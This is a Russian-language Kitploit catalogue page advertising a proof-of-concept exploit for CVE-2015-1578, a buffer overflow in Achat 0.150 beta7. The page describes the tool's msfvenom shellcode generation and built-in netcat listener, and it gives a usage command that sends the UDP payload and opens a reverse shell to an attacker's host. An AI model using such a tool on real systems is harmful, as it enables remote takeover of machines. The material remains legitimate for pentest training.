Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2015-1578-PoC — Это эксплойт концепции доказательства для CVE-2015-1578 — уязвимости переполнения буфера в Achat 0.150 beta7 на Windows. Эксплуатация приводит к удалённому выполнению кода через специально сформированный UDP-пакет. | Kitploit
Инструменты/GitHubGitHub/yaldobaoth/cve-2015-1578-poc
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияШелл-кодТестирование на ПроникновениеОбучение и ОбразованиеИнструмент Удаленного ДоступаЭксплуатация Бинарных Файлов

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHub
yaldobaoth/cve-2015-1578-poc

CVE-2015-1578-PoC

Это эксплойт концепции доказательства для CVE-2015-1578 — уязвимости переполнения буфера в Achat 0.150 beta7 на Windows. Эксплуатация приводит к удалённому выполнению кода через специально сформированный UDP-пакет.

Репозиторий
1 год назадЕщё не проверено

CVE-2015-1578-PoC

Обзор

Это PoC-эксплойт для CVE-2015-1578, уязвимости переполнения буфера в Achat 0.150 beta7 на Windows. Эксплуатация приводит к удалённому выполнению кода с помощью специально сформированного UDP-пакета.

Назначение

Этот PoC задуман как чистый, минимальный и хорошо структурированный пример разработки эксплойтов. Он демонстрирует:

  • Динамическую генерацию шеллкода с помощью msfvenom
  • Настройку и конфигурацию через аргументы командной строки
  • Встроенную настройку слушателя
  • Простую доставку полезной нагрузки через UDP

Видеоурок

Видеоурок

Зависимости

  • Python 3
  • msfvenom (часть Metasploit Framework)
  • rlwrap (для улучшенного использования Netcat)

Возможности

  • Динамически создаёт полезную нагрузку в Unicode-кодировке с помощью msfvenom
  • Автоматически запускает слушатель с помощью rlwrap nc
  • Поддерживает понятные аргументы командной строки
  • Корректно завершает работу, если необязательные модули полезной нагрузки отсутствуют

Аргументы

-i <target_ip> IP-адрес цели (обязательно) -l, --lhost <listener_ip> Локальный IP-адрес для обратной оболочки (обязательно) -p, --lport <port> Локальный порт для обратной оболочки (обязательно) --rport <port> Удалённый UDP-порт цели (по умолчанию: 9256)

Пример использования

root@kitploit:~
python3 chatter.py -i 10.10.10.74 -l 10.10.16.7 -p 9393

Это позволит:

  • Сгенерировать полезную нагрузку с указанными LHOST и LPORT
  • Запустить слушатель в фоновом потоке
  • Отправить эксплойт-нагрузку через UDP на цель
Скачать инструмент